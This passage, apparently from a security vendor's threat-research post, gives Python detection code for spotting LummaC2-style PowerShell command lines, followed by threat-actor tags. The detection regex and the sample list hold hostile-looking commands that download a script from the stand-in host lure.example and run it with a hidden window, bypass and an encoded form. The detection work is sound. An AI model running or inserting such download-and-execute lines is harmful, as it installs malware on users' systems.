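    r"(?:invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|net\.webclient)"
    r"[\s\S]*?(?:invoke-expression|\biex\b)", re.IGNORECASE)


def canonical_param(token: str):
    """Map -w / -Win / -WindowStyle (and the like) to the full parameter name, or None."""
    name = token.lstrip("-/").lower()
    if name in OVERRIDES:
        return OVERRIDES[name]
    hits = [c for c in CANONICAL if c.startswith(name)]
    return hits[0] if len(hits) == 1 else None


def decode_encoded_command(value: str):
    """-EncodedCommand carries base64 of a UTF-16LE script; return the script or None."""
    try:
        return base64.b64decode(value.strip('"'), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def normalise(cmdline: str) -> dict:
    """Resolve abbreviated switches and collect the script text from -Command / -EncodedCommand."""
    info = {"hidden": False, "encoded": None, "exec_policy": None, "script": ""}
    tokens = TOKEN_RE.findall(cmdline)
    i = 1                                   # tokens[0] is the image name
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        param = canonical_param(tok) if tok.startswith(("-", "/")) else None
        if param == "windowstyle":
            info["hidden"] = nxt.strip('"').lower() == "hidden"
            i += 2
        elif param == "encodedcommand":
            info["encoded"] = decode_encoded_command(nxt)
            info["script"] += " " + (info["encoded"] or "")
            i += 2
        elif param == "executionpolicy":
            info["exec_policy"] = nxt.strip('"').lower()
            i += 2
        elif param == "command":            # everything after -c is the script
            info["script"] += " " + " ".join(tokens[i + 1:]).strip('"')
            break
        else:
            i += 1
    return info


def indicators(cmdline: str) -> list:
    """Names of the LummaC2-style traits present in one powershell.exe command line."""
    info = normalise(cmdline)
    checks = [
        ("hidden_window", info["hidden"]),
        ("encoded_command", info["encoded"] is not None),
        ("execpolicy_bypass", info["exec_policy"] in ("bypass", "unrestricted")),
        ("download_then_iex", DOWNLOAD_EXEC_RE.search(info["script"]) is not None),
    ]
    return [name for name, hit in checks if hit]


# Constructed samples; the encoded one is built here so the demo stays self-contained.
CONSTRUCTED_ENCODED = base64.b64encode(
    "iwr http://lure.example/s.ps1 -UseBasicParsing | iex".encode("utf-16-le")).decode()
SAMPLES = [
    'powershell.exe -nop -w hidden -ep bypass -c "iwr http://lure.example/x.ps1 | iex"',
    f"powershell.exe -W Hidden -enc {CONSTRUCTED_ENCODED}",
    r"powershell.exe -NoProfile -File C:\scripts\backup.ps1",
]
```

Running `indicators()` over each entry in SAMPLES flags the first two and leaves the -File invocation clean.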


Tags: Threat Actor: COLDRIVER, UNC4057, Star Blizzard, Callisto | Threat Actor Location: Russia | Target Location: United States, Global (with focus on users searching for pirated software/media), Western countries (including U.S., U.K., Ukraine) | Target Sector: Critical Infrastructure, Financial Services, Government, Healthcare, Energy, Enterprise (corporate credentials), Personal users (passwords, browser data), Military, NGOs, Media, Think Tanks | Target System: Windows-based systems (Workstations & Servers), Windows OS, Applications including browsers, RDP clients, email clients, password managers | Initial Access: Phishing emails, ClickFix lures, Fake CAPTCHA pages, Social engineering (ClickFix CAPTCHA lure), Search engine manipulation (malicious SEO), Fake CAPTCHA with clipboard PowerShell execution (“ClickFix”) | Malware Type: Infostealer | Malware Family: LummaC2, LUMMAC.V2, Lummastealer | Malware/Tools: LOSTKEYS, PowerShell, VBS Decoder, Base64 Encoded Payloads, Fake CAPTCHA Lure

For a full list of the search queries used on Autonomous Threat Sweeper for the threats detailed above, refer to our Threat Labs home page. The page also references a list of relevant policies used by threat actors. 

We would like to hear from you. Please reach out to us at scia@securonix.com

Note: The TTPs, when used in isolation, are prone to false positives and noise and should ideally be combined with the other indicators mentioned.

Contributors: Dheeraj Kumar, and Sina Chehreghani